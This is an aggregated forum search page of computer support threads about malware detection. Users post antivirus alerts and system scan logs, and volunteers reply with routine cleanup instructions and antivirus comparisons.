Computer Support Forum

Malware detection and blacklist detection for Websites..sign up for free!

Question: Malware detection and blacklist detection for Websites..sign up for free!

Comodo SiteInspector has new features and it's free to sign up. Good service for those who have their own websites.

Relevance 100%

Answer: Malware detection and blacklist detection for Websites..sign up for free!

I saw this earlier, looks like they changed it from 30 days to 365 days.

These type of services from Comodo I like.

http://siteinspector.comodo.com/public

http://siteinspector.comodo.com/public/features

9 more replies
Relevance 96.76%

For anyone interested http://www.westcoastlabs.com/realTimeTesting/article/?articleID=1#item3

For many people, paying for an Internet Security Suite is either not an option or not a choice they'd like to make, depending on how you look at things. Luckily there are more than a few free software solutions on offer. For the testing of these we worked with West Coast Labs (WCL).

Thanks to West Coast Labs, PC & Tech Authority is providing its readers with real time access to the testing data from free security suites. This means you'll be able to see the prevention rates as a percentage across the three vectors, as well as the average prevention rate for each service.
 

Answer:Free Antivirus: Real Time Anti-Malware Detection Rates

Thanks for the heads up

How come that Panda, adware AV, COMODO AV and some others weren't a part of this test? They are free. Four products is not enough.

I really wonder why people make such a big deal of malware detection; what happens if it doesn't have detection for it through signature... In my eyes this means nothing and worthless test.
 

2 more replies
Relevance 89.38%

Okay, I have turned my PC on after not having it on in 3 months (due to having to buy a new graphics card). Anyway, everything was running smooth until I heard a few beeps, only to see that Avira has detected a few viruses. I had a choice to either remove or ignore, so I pushed remove. 10 minutes later Avira is detecting the virus again, so I click remove and then do a quick scan with Malwarebytes, and it did not detect anything. So I did a full scan with my Avira Anti Virus and it found 1 warning, 13 hidden files and 30 detections. Now I would like to know what to do from here to completely get rid of the 30 detections that it has found. The two that it has detected look like this: TR/BHO.ZWANGI.Trojan TR/GerVar.EJ Trojan. There are 30 of them in my Avira quarantine, so what I would like to know is where to go from here. Thank you.

DDS (Ver_10-03-17.01) - NTFSx86
Run by DJ at 19:40:17.32 on Thu 09/09/2010
Internet Explorer: 7.0.5730.13 BrowserJavaVersion: 1.6.0_20
Microsoft Windows XP Home Edition 5.1.2600.3.1252.1.1033.18.1023.518 [GMT -7:00]
AV: AntiVir Desktop *On-access scanning enabled* (Updated) {AD166499-45F9-482A-A743-FDD3350758C7}
============== Running Processes ===============
C:\WINDOWS\system32\nvsvc32.exe
C:\windows\system32\svchost -k DcomLaunch
C:\windows\system32\svchost -k rpcss
C:\windows\System32\svchost.exe -k netsvcs
svchost.exe
svchost.exe
C:\windows\system32\spoolsv.exe
C:\Program Files\Avira&... Read more

Answer:avira virus detection beeps with detection pop ups

Hello and welcome to Bleeping Computer.

We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. Please include a clear description of the problems you're having, along with any steps you may have performed so far.

Please refrain from running tools or applying updates other than those we suggest while we are cleaning up your computer. The reason for this is so we know what is going on with the machine at any time. Some programs can interfere with others and hamper the recovery process.

Even if you have already provided information about your PC, we need a new log to see what has changed since you originally posted your problem.

We need to create an OTL Report

Please download OTL from one of the following mirrors:
This is THE Mirror
Save it to your desktop.
Double click on the icon on your desktop.
Click the "Scan All Users" checkbox.
In the custom scan box paste the following:

CODE
msconfig
safebootminimal
activex
drivers32
netsvcs
%SYSTEMDRIVE%\*.exe
/md5st... Read more

2 more replies
Relevance 89.38%

Okay, I have turned my PC on after not having it on in 3 months (due to having to buy a new graphics card). Anyway, everything was running smooth until I heard a few beeps, only to see that Avira has detected a few viruses. I had a choice to either remove or ignore, so I pushed remove. 10 minutes later Avira is detecting the virus again, so I click remove and then do a quick scan with Malwarebytes, and it did not detect anything. So I did a full scan with my Avira Anti Virus and it found 1 warning, 13 hidden files and 30 detections. Now I would like to know what to do from here to completely get rid of the 30 detections that it has found. The two that it has detected look like this: TR/BHO.ZWANGI.Trojan TR/GerVar.EJ Trojan. There are 30 of them in my Avira quarantine, so what I would like to know is where to go from here. Thank you.

Answer:avira virus detection beeps with detection pop ups

Hello,

Please follow the instructions in ==>This Guide<==. Once the proper logs are created, then make a NEW TOPIC and post it ==>HERE<==

If you can produce at least some of the logs, then please create the new topic. If you cannot produce any of the logs, then post back here and we will provide you with further instructions.

2 more replies
Relevance 84.87%

"Why Phishing Works" is a recent study (PDF) that examines phishing website techniques. The most visually deceptive website spoof in the study was able to fool 90% of the study's participants. That 90% figure includes the most technically advanced users among the participants. It was the look, not the spoofing of security features that did the job...f-secure.com/weblog

Answer:Flaw In Human Brain Prevents Detection Of Phishing Websites

Hi quietman7, help me out a bit please as I don't do electronic banking. Were they looking for you to give them your ID, as on the left, or both ID and password, as on the right?

3 more replies
Relevance 84.05%

I have every few days, after deleting it each time, seen a repeat detection in AVG Free 8 for Win XP the following detection:

Object name: HKLM\SOFTWARE\Omniquad
Detection name: Found Adware.RogueSuspect
Object type: registry key
SDK Type: Core
Result: Moved to Virus Vault

I recently noticed the above detection mentioned a couple of places on the web when I searched for info on it. A recent discussion appears in Yahoo Answers: Yahoo Answers discussion.

I've come here to get your opinion and have followed your preparation guide for asking a question. I last removed it a couple of days ago and started to follow your prep directions before re-engaging AVG. I'm afraid that within a couple of days I'll see "Omniquad" detected again. I mostly use Zone Alarm and AVG 8 Free on a regular basis these days but am thinking of trying some other virus protection in the future. I do check periodically with Spybot, Spyware Blaster, and Ad-Aware from time to time.

Below are my current results from your preparation requirements, although I really am just wondering if you have any idea what Omniquad is and why it shows up sometimes (since there is no Omniquad in my Add/Remove programs):

--------------------------------------------------------------------------------
KASPERSKY ONLINE SCANNER 7 REPORT
Wednesday, July 16, 2008
Operating System: Microsoft Windows XP Home Edition Service Pack 3 (build 2600)
Kaspersky Online Scanner 7 version: 7.0.25.0
Program database last ... Read more

Answer:Omniquad Detection In Avg Free In Xp

Hello and welcome to BC.

We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. We aim to provide the valuable service known to come from BC to every member we can, but sometimes it takes just a little longer to get to every request for help.

If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine.

Upon completing the steps below a staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.

Thanks and again sorry for the delay.

Please download Deckard's System Scanner (DSS) and save to your Desktop.
alternate download site

DSS will do the following:
Create a new System Restore point in Windows XP and Vista.
Clean your Temporary Files, Downloaded Program Files, Internet Cache Files, and empty the Recycle Bin on all drives.
Check some important areas of your system and produce a report for an analyst to review.
Automatically run HijackThis. It will also install and place a shortcut to HijackThis on your desktop if you do not already have it installed. So if HijackThis is not installed and DSS prompts you to download it, please answer yes.

You must be logged onto an account with administrator priv... Read more

3 more replies
Relevance 82.82%

Antivirus: Free vs. Paid Detection

Avira, Microsoft Security Essentials, Kaspersky and avast!






Quote:
Taking care of your system these days seems to be a less complicated task than it used to be a few years back. Now, protection against malware begins the moment you install your operating system. Windows 7 offers some basic security through Windows Defender and also provides a better solution under the shape of Microsoft Security Essentials, which is free of charge and can be installed on systems passing genuine validation. So, going with Windows 7 may be the winning hand after all.


Source: Antivirus: Free vs. Paid Detection - Avira, Microsoft Security Essentials, Kaspersky and avast! - Softpedia

Answer:Antivirus: Free vs. Paid Detection

You pay for ESET.

And that's the best.

Pretty much settles that.

9 more replies
Relevance 82.82%

Twice I posted the following query on the free AVG forum and twice it appears to have been deleted! Even if they found the message embarrassing, I would have expected a personal reply. I would be pleased to receive comments (and answers!)


Can someone please explain to me why AVG is now finding viruses in files some of which were downloaded up to 6 months ago?
Most of the viruses found are described as "Virus found Proxy" although it also found "Trojan horse Downloader.Generic2.LKM" and "Trojan horse BackDoor.Generic4.QSO".

The last file was found in a program that I downloaded last September!

I run a "Complete Test" every day.

One last question - What is the "Proxy" virus?
 

Answer:AVG (Free) Late Detection of Viruses

I'm not sure about the specifics, but what may be the case is that the virus definitions have only been picked up in the most recent update. Seems strange that it has taken 6 months though!

Does the file you downloaded seem likely to contain viruses, or was it from a trusted source?
 

14 more replies
Relevance 82.82%

Hi. I am trying to maximize/optimize my security (and functioning) on my laptop (Dell Dimension M6300 running Windows Pro XP SP3). I have wireless internet connection (used primarily in my house) using an Intel PRO/Wireless 3945ABG Network Connection adaptor via router to cable high speed internet.

I am currently using the following security/updating/patching methods:
1. AVG Free 8.5
2. SuperAntiSpyware (Free Edition)
3. Malwarebytes' Anti-Malware (Free Edition)
4. Spyware Blaster
5. Windows Firewall
6. CCleaner
7. FileHippo Update Checker
8. Microsoft/Windows Update & Automatic Update
9. Microsoft Baseline Security Analyzer
10. Windows Disk Defragmenter
11. Sysinternals PageDefrag
12. Sysinternals AutoRuns
13. Sysinternals ProcessExplorer
14. HiJackThis
15. Chkdsk (checking "Scan for and attempt recovery of bad sectors")
16. Disk Cleanup
17. Host File using Windows XP MVP List
18. Glary Utilities
19. CWShredder
20. ERUNT & NTREGOPT
21. Online scans using the following: Kaspersky A/V, WindowsLive OneCare, Panda ActiveScan, TrendMicro HouseCall

So I have a couple of questions about this (overkill). I feel like I am spending more time running security scans, checking for updates, etc., etc., than the time I spend doing all other things combined on the computer, which is not a good thing. I am not knowledgeable enough to know which of these things are complete overlap, or a complete waste of time, or how frequently to run each of t... Read more

Answer:Does AVG Free 8.5 offer rootkit detection?

Hello,

I'm shifting this to the Antivirus and Security programs forum. ~ OB

6 more replies
Relevance 82.82%

Avira, Microsoft Security Essentials, Kaspersky and avast! put to the test.
A very interesting read...not comprehensive but informative:

Antivirus: Free vs. Paid Detection - Avira, Microsoft Security Essentials, Kaspersky and avast! - Softpedia

Answer:Antivirus: Free vs. Paid Detection

I either use the free versions of Avast or Avira (sans nag screen) for my installations + common sense, I've done pretty well in remaining clean.

Testing 'sus' files in a VM also helps as well.

And if I ever do get infected, well I got what I paid for

5 more replies
Relevance 82%

AV-Comparatives' test only considered the premium version, but how much worse are the numbers usually for the free version?
 

Answer:Avira Free detection rates vs Premium's

Based on their site's comparison these are the differences between the free and the premium version.
 

9 more replies
Relevance 82%

Hi There,

I recently had a case of windows police pro rogue antivirus on my pc. I was able to get rid of that but now I keep getting an infection notice from my AVG Free Resident shield detection saying C:\\WINDOws\system32\gasfkyibcrqkoi.dll. Any help will be great!

Answer:gasfkyibcrqkoi.dll AVG Free Resident shield detection

Hello and welcome to Bleeping Computer.

We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.

Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.

If you have already posted a DDS log, please do so again, as your situation may have changed. Use the 'Add Reply' and add the new log to this thread.

Thanks and again sorry for the delay.

We need to see some information about what is happening in your machine. Please perform the following scan:
Download DDS by sUBs from one of the following links. Save it to your desktop.
DDS.scr
DDS.pif
Double click on the DDS icon, allow it to run.
A small box will open, with an explanation about the tool. No input is needed, the scan is running.
Notepad will open with the results.
Foll... Read more

2 more replies
Relevance 82%

So some minutes ago my antivirus denied access to some temp file I never remember getting, PUA Candy gen or something along those lines. I scanned the whole temp folder and found another virus identical to this 1 and a couple of suspicious files. Needless to say I am currently scanning the drivers for more viruses. I deleted the whole temp folder.
I'm not sure if I should be afraid, rework my passwords or what else, I don't usually get viruses as I scan every download so I don't know where those came from.
Any suggestions?

More replies
Relevance 82%
Question: Malware detection?

Dear Sirs,

AVG recently detected a trojan dropper and removed it in safe mode. Shortly afterwards, Rapport detected "Tilon" malware and "attempted removal" but did not confirm it had done so.
I scanned with Malwarebytes which did not detect anything. I tried their Rootkit removal tool which refused to run until I used their Chameleon application. It gave me the message "dda driver missing" but the program did run after a reboot - as per instructions. Again, did not detect anything.

I then followed your methodology for malware scanning and attached the logs. I have not yet "fixed" anything -as per your instructions.

I do not seem to be having any obvious problems but would be glad if you are able to advise if I need to do anything else or confirm if everything is OK as I use Windows 7 for internet banking.

Many thanks in advance for all your help.
Regards,
Dave.

Computer: Desktop Core i3, Dual boot Windows 7 and XP
 

Answer:Malware detection?

Welcome to Major Geeks!

Your logs are clean. The only issue I notice is that your AVG software seems to be rather out of date. Per your logs it is either AVG10 or AVG2011 and the current version is AVG 2013.


Since you are not having malware problems, it is time to do our final steps:

We recommend you keep Malwarebytes Anti-Malware for scanning/removal of malware.

Go back to step 4 of the READ ME and re-enable your Disk Emulation software with Defogger if you had disabled it.
Go to add/remove programs and uninstall HijackThis. If you don't see it or it will not uninstall, don't worry about it. Just move on to the next step.
If running Vista or Win 7, it is time to make sure you have reenabled UAC by double clicking on the C:\MGtools\enableUAC.reg file and allowing it to be added to the registry.
Go to the C:\MGtools folder and find the MGclean.bat file. Double click (if running Vista, Win7, or Win 8 Right Click and Run As Administrator) on this file to run this cleanup program that will remove files and folders related to MGtools and some other items from our cleaning procedures.

Any other miscellaneous tools we may have had you install or download can be uninstalled and deleted.

After doing the above, you should work thru the below link:
How to Protect yourself from malware!
 

3 more replies
Relevance 82%
Question: malware detection

need help my computer is acting crazy....

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 10:49:10 AM, on 5/18/2010
Platform: Windows Vista SP2 (WinNT 6.00.1906)
MSIE: Internet Explorer v8.00 (8.00.6001.18904)
Boot mode: Normal
Running processes:
C:\Windows\system32\taskeng.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe
C:\Program Files\Common Files\Java\Java Update\jusched.exe
C:\Windows\System32\wpcumi.exe
C:\Windows\System32\rundll32.exe
C:\Program Files\Microsoft Security Essentials\msseces.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Windows\ehome\ehtray.exe
C:\Program Files\Windows Media Player\wmpnscfg.exe
C:\Windows\ehome\ehmsas.exe
C:\Windows\system32\wuauclt.exe
C:\Program Files\Acer\Empowering Technology\NotificationCenter\Framework.NotificationCenter.exe
C:\Windows\System32\wercon.exe
C:\Users\jen\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\jen\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe
R1 - HKCU\Software\Microsoft\Interne... Read more

Answer:malware detection

Hello and Welcome to the forums! My name is Gringo and I'll be glad to help you with your computer problems.

Some things to remember while we are working together.
1. Please do not run any other tool until instructed to do so!
2. Please reply to this thread, do not start another!
3. Please tell me about any problems that have occurred during the fix.
4. Please tell me of any other symptoms you may be having as these can help also.
5. Please try as much as possible not to run anything while executing a fix.
If you follow these instructions, everything should go smoothly.

Please subscribe to this thread to get immediate notification of replies as soon as they are posted. To do this click Thread Tools, then click Subscribe to this Thread. Make sure it is set to Instant Notification, then click Subscribe.

I would like to get a better look at your system, please do the following so I can get some more detailed logs.

DeFogger:
Please download DeFogger to your desktop.
Double click DeFogger to run the tool.
The application window will appear
Click the Disable button to disable your CD Emulation drivers
Click Yes to continue
A 'Finished!' message will appear
Click OK
DeFogger may ask you to reboot the machine, if it does - click OK
Do not re-enable these drivers until otherwise instructed.
IMPORTANT! If you receive an error message while running DeFogger, please post the log defogger_disable which will appear on your desktop.

Download DDS:
Please download DDS by... Read more

3 more replies
Relevance 82%

Hello, BC. Thanks for taking the time to help me deal with my malware problem. I suspect I may have an advanced spyware infection on my PC. If you can help me with analyzing these logs I would really appreciate it. If you need me to run any scans just let me know and I can send you more log files, or if you need any info in general. All help is greatly appreciated. Thank you.
-DukhaNirodha
 
DDS LOG
 

DDS (Ver_2012-11-20.01) - NTFS_AMD64 
Internet Explorer: 8.0.7601.17514
Run by House at 5:58:03 on 2014-03-31
Microsoft Windows 7 Ultimate   6.1.7601.1.1252.1.1033.18.4086.1592 [GMT -7:00]
.
AV: Panda Cloud Antivirus *Enabled/Updated* {3456760B-FDAA-FFFD-06C2-7BB528D2066C}
AV: AVG AntiVirus Free Edition 2014 *Enabled/Updated* {0E9420C4-06B3-7FA0-3AB1-6E49CB52ECD9}
AV: 360 Internet Security *Enabled/Updated* {2B66EE1E-E5C8-C2F7-648F-4E55AC68D37D}
SP: 360 Internet Security *Enabled/Updated* {90070FFA-C3F2-CD79-5E3F-7527D7EF99C0}
SP: Panda Cloud Antivirus *Enabled/Updated* {8F3797EF-DB90-F073-3C72-40C753554CD1}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: AVG AntiVirus Free Edition 2014 *Enabled/Updated* {B5F5C120-2089-702E-0001-553BB0D5A664}
FW: Cloud Antivirus Firewall *Disabled* {0C6DF72E-B7C5-FEA5-2D9D-D280D6014117}
FW: Online Armor Firewall *Enabled* {BD3F5FCA-866B-1E2E-0A68-58900A751EA1}
.
============== Running Processes ===============
.
C:\PROGRA~2\AVG\AVG2014\avgrsa.exe
C:\Program Files (x86)\AVG\AVG2014\avgcsrva.... Read more

Answer:Please Help w/ Malware Detection

I accidentally posted this twice you can remove this one if you want.

5 more replies
Relevance 82%

Hello, BC. Thanks for taking the time to help me deal with my malware problem. I suspect I may have an advanced spyware infection on my PC. If you can help me with analyzing these logs I would really appreciate it. If you need me to run any scans just let me know and I can send you more log files, or if you need any info in general. All help is greatly appreciated. Thank you.
-DukhaNirodha
 
DDS LOG
 
DDS (Ver_2012-11-20.01) - NTFS_AMD64 
Internet Explorer: 8.0.7601.17514
Run by House at 5:58:03 on 2014-03-31
Microsoft Windows 7 Ultimate   6.1.7601.1.1252.1.1033.18.4086.1592 [GMT -7:00]
.
AV: Panda Cloud Antivirus *Enabled/Updated* {3456760B-FDAA-FFFD-06C2-7BB528D2066C}
AV: AVG AntiVirus Free Edition 2014 *Enabled/Updated* {0E9420C4-06B3-7FA0-3AB1-6E49CB52ECD9}
AV: 360 Internet Security *Enabled/Updated* {2B66EE1E-E5C8-C2F7-648F-4E55AC68D37D}
SP: 360 Internet Security *Enabled/Updated* {90070FFA-C3F2-CD79-5E3F-7527D7EF99C0}
SP: Panda Cloud Antivirus *Enabled/Updated* {8F3797EF-DB90-F073-3C72-40C753554CD1}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: AVG AntiVirus Free Edition 2014 *Enabled/Updated* {B5F5C120-2089-702E-0001-553BB0D5A664}
FW: Cloud Antivirus Firewall *Disabled* {0C6DF72E-B7C5-FEA5-2D9D-D280D6014117}
FW: Online Armor Firewall *Enabled* {BD3F5FCA-866B-1E2E-0A68-58900A751EA1}
.
============== Running Processes ===============
.
C:\PROGRA~2\AVG\AVG2014\avgrsa.exe
C:\Program Files (x86)\AVG\AVG2014\avgcsrva.e... Read more

Answer:Please Help w/ Malware Detection

Hi there,
my name is Marius and I will assist you with your malware related problems.

Before we move on, please read the following points carefully.
First, read my instructions completely. If there is anything that you do not understand kindly ask before proceeding.
Perform everything in the correct order. Sometimes one step requires the previous one.
If you have any problems while following my instructions, stop there and tell me the exact nature of your problem.
Do not run any other scans without instruction or add/remove software unless I tell you to do so. This would change the output of our tools and could be confusing for me.
Post all logfiles as a reply rather than as an attachment unless I specifically ask you. If you can not post all logfiles in one reply, feel free to use more posts.
If I don't hear from you within 3 days from this initial or any subsequent post, then this thread will be closed.
Stay with me. I will give you some advice about prevention after the cleanup process. Absence of symptoms does not always mean the computer is clean.
My first language is not English. So please do not use slang or idioms. It could be hard for me to read. Thanks for your understanding.

Multiple Antivirus Programs installed!
I do not recommend that you have more than one anti-virus product installed and running on your computer at a time. The reason for this is that if both products have their automatic (Real-Time) protection switched on, then those products which... Read more

6 more replies
Relevance 81.18%

Donna Buenaventura, a security software expert and MVP, wrote a comparative review on BrightHub.com: Which is the Best? A-squared Free Vs Malwarebytes' Anti-Malware

Answer:a-squared Free outperforms Malwarebytes in detection and removal!

I always take note of what Donna says. I did like her conclusion that since they are both free get them both, and why not.

9 more replies
Relevance 81.18%

Recently, my Mozilla browser started opening up unwanted tab sessions. It kept occurring at such a fast rate that I couldn't close out the tabs or browser itself so I had to reboot the laptop.

My computer is already running avast! Antivirus and SuperAntiSpyware Professional edition, with negative findings after updates and scans from each.

I was concerned so I downloaded Microsoft Security Essentials (before I knew how slow it runs).

When I ran it, it discovered two items:

TrojanDownloader:Java/OpenConnection.OS
Exploit:Java/CVE-2010-0840.DR

First, how do I know these are legitimate malware items?

Second, I know no software can detect everything 100% of the time, but I'm surprised at least one of these programs didn't detect these two items, if they are real.

Third, could these two items be the cause of the tabs opening up on my Mozilla browser?
 

Answer:Malware detection question

It is hard to answer your questions based on that info. If you want us to check your system for malware, please do the following:

READ & RUN ME FIRST. Malware Removal Guide
 

3 more replies
Relevance 81.18%

How can we detect any malware or spyware installed in our PC without our knowledge?

Answer:Malware/Spyware detection

Perform scans with your anti-virus and anti-malware software such as Malwarebytes Anti-Malware.

List of Free Scan & Disinfection Tools to supplement your anti-virus or get a second opinion

From that list, I would recommend any (or a combination) of the first seven, especially these... Emsisoft AntiMalware, Emsisoft Emergency Kit, Zemana AntiMalware and the Kaspersky Virus Removal Tool.

You can also supplement your anti-virus or get a second opinion by performing an Online Virus Scan. ESET is one of the more effective online scanners.

3 more replies
Relevance 81.18%

Can someone give me a program name or link to check my computer for these issues?
 

Answer:Malware & Spyware Detection

I ran a Combo Fix and here is the results.

ComboFix 07-08-17.2 - "Angela" 2007-08-21 20:02:17.1 - NTFSx86
Microsoft Windows XP Professional 5.1.2600.2.1252.1.1033.18.508 [GMT -5:00]
* Created a new restore point
((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
C:\DOCUME~1\Angela\Desktop\internet.lnk
C:\WINDOWS\system32\x64
((((((((((((((((((((((((( Files Created from 2007-07-22 to 2007-08-22 )))))))))))))))))))))))))))))))
2007-08-21 20:00 51,200 --a------ C:\WINDOWS\nircmd.exe
2007-08-21 19:47 <DIR> d-------- C:\WINDOWS\system32\ActiveScan
2007-08-21 18:54 <DIR> d-------- C:\WINDOWS\LastGood
2007-08-21 18:50 <DIR> d-------- C:\DOCUME~1\Angela\APPLIC~1\Uniblue
2007-08-21 08:02 <DIR> d-------- C:\DOCUME~1\Angela\APPLIC~1\ColtsScreenServer
2007-08-12 13:17 <DIR> d-------- C:\DOCUME~1\ALLUSE~1\APPLIC~1\Trymedia
2007-08-12 13:17 <DIR> d-------- C:\DOCUME~1\ALLUSE~1\APPLIC~1\Oberon Media
2007-08-12 11:50 <DIR> d-------- C:\DOCUME~1\Angela\APPLIC~1\Big Fish Games
2007-08-11 20:54 <DIR> d-------- C:\DOCUME~1\Angela\APPLIC~1\Magic Academy
2007-08-01 17:37 <DIR> d-------- C:\DOCUME~1\Angela\APPLIC~1\SpinTop
2007-07-29 17:24 <DIR> d-------- C:\DOCUME~1\ALLUSE~1\APPLIC~1\SpinTop Games
2007-07-28 14:59 <DIR> d-------- C:\Program Files\iTunes
2007-07-28 14:59 <DIR> d-------- C:\Program Files\iPod
2007-07-26 21:05 <DIR> d-------- C:\DOCU... Read more

3 more replies
Relevance 81.18%

Hi,
I just want to know if Malware infection can be detected by ATA on a domain controller that is being mirrored/monitored by it.
David

Akinzo

More replies
Relevance 81.18%

Hai,

My sites http://heathrow-taxi-booking.co.uk and http://gatwick-taxi-booking.co.uk have received the messages "Malware detected on heathrow-taxi-booking.co.uk" and "Malware detected on gatwick-taxi-booking.co.uk" from Bing. They mentioned as the reason "Reference to known malware distribution network detected. This could be via inclusion of an iframe or frame tag, an embedded object, or a script tag". But I have had my site checked by experts and the result was clean. The hosting company also confirmed it. But Bing disabled the link for the sites.

Can anyone give a solution for this problem? Thanks in advance

Answer:Malware detection by Bing

Please download MiniToolBox, save it to your desktop and run it.

Checkmark the following checkboxes:
Flush DNS
Report IE Proxy Settings
Reset IE Proxy Settings
Report FF Proxy Settings
Reset FF Proxy Settings
List content of Hosts
List IP configuration
List Winsock Entries
List last 10 Event Viewer log
List Installed Programs
List Users, Partitions and Memory size.

Click Go and post the result (Result.txt). A copy of Result.txt will be saved in the same directory the tool is run.
Note: When using "Reset FF Proxy Settings" option Firefox should be closed.

Download TDSSKiller and save it to your desktop.
Extract (unzip) its contents to your desktop.
Open the TDSSKiller folder and doubleclick on TDSSKiller.exe to run the application, then on Start Scan.
If an infected file is detected, the default action will be Cure, click on Continue.
If a suspicious file is detected, the default action will be Skip, click on Continue.
It may ask you to reboot the computer to complete the process. Click on Reboot Now.
If no reboot is required, click on Report. A log file should appear. Please copy and paste the contents of that file here.
If a reboot is required, the report can also be found in your root directory (usually C:\ folder) in the form of TDSSKiller_xxxx_log.txt. Please copy and paste the contents of that file here.
...
ADW Cleaner
Please download AdwCleaner by Xplode and save to your Desktop.
Double-click on AdwCleaner.exe to run the tool.
Vista/Windows 7/8 users right-click and select Run As Administrator.
C... Read more

2 more replies
Relevance 81.18%

I have been posting in the "Networking" forum and have gotten very much useful information. I am just wondering how to detect Malware and Spyware that don't show up with my Malwarebytes or McAfee programs.
Thanks a bunch
 

Answer:Secret Malware Detection

16 more replies
Relevance 81.18%

Hi,

You've saved my life before and I'm hoping you can step in again!

I started up my PC recently and received a warning from AntiVir about Malware. The warning appeared as a pop-up window in the bottom right of the screen and gave me the option to remove the detected files (14 of them), which I did. Antivir then did a quick repair/scan and popped up a similar warning, with a different number of files detected (83!). Again, I clicked Remove and the same thing happened, with another warning appearing. At this point I got a little suspicious.

The AntiVir details mentioned TR/Dldr.Agent.gbnx as being detected.

I've attached/pasted the logs below.

Thank you in advance for any help you can offer.

Chris.

--- TSG File ------------
Tech Support Guy System Info Utility version 1.0.0.1
OS Version: Microsoft Windows XP Professional, Service Pack 3, 32 bit
Processor: AMD Athlon(tm) , x86 Family 6 Model 10 Stepping 0
Processor Count: 1
RAM: 2559 Mb
Graphics Card: NVIDIA GeForce2 GTS/GeForce2 Pro, 64 Mb
Hard Drives: C: Total - 78152 MB, Free - 11607 MB; E: Total - 476937 MB, Free - 287881 MB; K: Total - 305242 MB, Free - 98556 MB;
Motherboard: ASUSTeK Computer INC., A7N8X2.0, REV 2.xx, xxxxxxxxxxx
Antivirus: AntiVir PersonalEdition Classic Virus Protection, Updated: Yes, On-Demand Scanner: Enabled

-----------------------
Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 20:39:12, on 21/04/2011
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explore... Read more

Answer:Repeated Malware detection

11 more replies
Relevance 81.18%

The traditional signature-based method to detect viruses and other malware is increasingly seen as an insufficient defense given the rapid pace at which attackers are churning out virus and spyware variants.... The three security vendors that dominate the antivirus market today, McAfee, Symantec and Trend Micro, say they have no intention of abandoning signature-based defense... However, the big three vendors acknowledge there's a need to augment this decades-old methodology... in its next enterprise antivirus release planned for this summer, Symantec will include whitelisting technology for policy-based control of applications down to a software-component level... Symantec will also make use of behavior blocking that promises to be able to stop at least some malware from executing... networkworld.com

More replies
Relevance 81.18%

Hi There,

I'm hoping someone can point me in the right direction here....

You may have heard of a trojan called Generic!atr, well my computer got that and when I started it up, there was no start/tool bar or any icons on my computer.

Using the task manager, I was able to get McAfee running and it picked up that trojan and two other potentially unwanted programs.

Once that was done, I was advised (by someone) that I should try and re-load XP, so I did - only finding out afterwards that I should have just done a system restore to an earlier date and fixing it from there - but I didn't and now I can't because XP has been reloaded, so there is no previous restore dates for it to restore from.

So through safe mode I managed to turn off system restore so I could run another scan and see if it would pick anything else up.

My computer is still not loading with the task bar or any icons, and would be so GRATEFUL and appreciate if anyone knows anyway I can manually get rid of this damn problem and get my XP back running properly.

Sorry if I posted this in the wrong spot but if anyone can point me into some direction where I can get the help I need I would be indebted!

Thank you!

PS I have been searching and searching on-line for days to find some solution but they all seem to have basic solutions using the system restore - which is a no go for me.

Answer:XP pro problem after malware detection

re-install windows again. this time format the drive. Since you've lost your original data, all thats left to lose is some of your time.
good luck

3 more replies
Relevance 81.18%

Mcafee has been alerting me of some malware it found by the name of Adware-bho.gen.c Please see HJT log below to help me track this badboy down! Thanks:

Answer:Adware-bho.gen.c Malware detection

Hello and welcome to Bleeping Computer

We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help.

If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a description of your problem, along with any steps you may have performed so far.

Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.

If you have already posted a DDS log, please do so again, as your situation may have changed.
Use the 'Add Reply' and add the new log to this thread.

Thanks and again sorry for the delay.

We need to see some information about what is happening in your machine. Please perform the following scan:
Download DDS by sUBs from one of the following links. Save it to your desktop.
DDS.com
DDS.scr
DDS.pif
Double click on the DDS icon, allow it to run.
A small box will open, with an explanation about the tool. No input is needed, the scan is running.
Notepad will open with the results, click no to the Optional_Scan
Follow the ... Read more

2 more replies
Relevance 81.18%

Hey all,

I am interested in finding out how you guys configure (harden) your home and/or corporate systems for malware prevention/detection. Specifically for spyware, browser hijacks, etc.

Obviously, you would set in place an anti-virus application and malware detection application like SpyBot. However, what would be a few procedures to take it a step higher? Modify the hosts file, configure automation in SpyBot, etc?

Thanks!
-Cedric
 

Answer:Malware Prevention & Detection

don't click on stuff that promises "improved results". use firefox. have 56k
 

5 more replies
Relevance 81.18%

Hello,

